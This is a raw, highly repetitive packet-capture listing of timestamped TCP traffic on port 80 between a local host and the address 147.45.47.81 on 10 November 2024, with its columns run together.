                                                                                                                                                                                Nov 10, 2024 09:18:29.137093067 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.137124062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.153346062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153382063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153402090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153439999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153445005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.153453112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153482914 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.153621912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153664112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153669119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.153676033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153709888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153722048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.153753996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.153753996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.154345036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154356956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154408932 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.154438972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154450893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154462099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154511929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154525995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154535055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.154544115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154556036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.154587030 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.154989004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.155019999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.155044079 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.155154943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.155204058 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.155878067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.155898094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.155910015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.155922890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.155951023 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.155991077 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.156006098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.156018019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.156032085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.156043053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.156066895 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.156079054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.197257996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.197274923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.197288036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.197307110 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.197387934 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.197429895 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.209841967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.209855080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.209867954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.209887028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.209948063 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.209969044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.209974051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.209985018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.210035086 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.210092068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.210103989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.210150003 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.210248947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.210259914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.210280895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.210290909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.210350037 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.210350037 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211215973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211236954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211246967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211287022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211298943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211304903 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211323977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211328030 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211335897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211355925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211366892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211378098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211390972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211394072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211394072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211411953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211416960 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211426020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211472988 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211606026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211616993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211627960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211639881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211662054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211674929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211858034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211868048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211879015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211890936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.211905003 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.211941004 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.212896109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.212908030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.212920904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.212958097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.212960005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.212960005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.212970972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.212984085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.212996006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213001966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213052034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.213088989 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.213823080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213834047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213840008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213887930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.213887930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.213888884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213901043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213911057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213917971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.213957071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.213995934 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.214744091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214766026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214778900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214835882 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.214903116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214915991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214927912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214940071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214951992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214962959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.214970112 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215001106 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215001106 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215398073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215420008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215431929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215451002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215485096 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215734005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215745926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215758085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215770960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215806961 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215828896 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215846062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215857983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215871096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215883970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.215904951 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.215956926 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216029882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216039896 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216063023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216073036 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216075897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216087103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216100931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216125965 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216126919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216136932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216161013 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216188908 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216305017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216316938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216365099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216366053 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216383934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216394901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216408014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216419935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216440916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216444969 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216444969 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216454029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216464996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216478109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216490984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216500998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216500998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216504097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216532946 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216562033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216631889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216661930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216674089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.216748953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.216983080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217003107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217015982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217052937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217091084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217103958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217116117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217135906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217176914 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217190981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217202902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217220068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217231989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217246056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217278004 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217365026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217377901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217396021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217407942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217422009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217467070 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217467070 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217540979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217551947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217586994 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217592955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217605114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217634916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217668056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217680931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217691898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.217706919 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.217813969 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252232075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252255917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252266884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252279043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252291918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252310991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252325058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252335072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252341032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252394915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252394915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252398968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252413034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252422094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252427101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252439022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252460003 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252484083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252496958 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252501011 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252507925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252532005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252542019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.252547979 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252547979 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.252607107 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269056082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269068956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269079924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269095898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269129038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269155979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269187927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269193888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269200087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269217968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269231081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269237995 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269260883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269263983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269272089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269311905 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269916058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269926071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269943953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269962072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269979954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.269988060 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269988060 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.269994974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270004988 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270031929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.270035982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270049095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270051956 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.270066977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270078897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270092010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270103931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270113945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.270113945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.270167112 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.270589113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270600080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270611048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270623922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.270643950 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.270704031 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.271095037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271106005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271122932 CET8049833147.45.47.81192.168.2.9
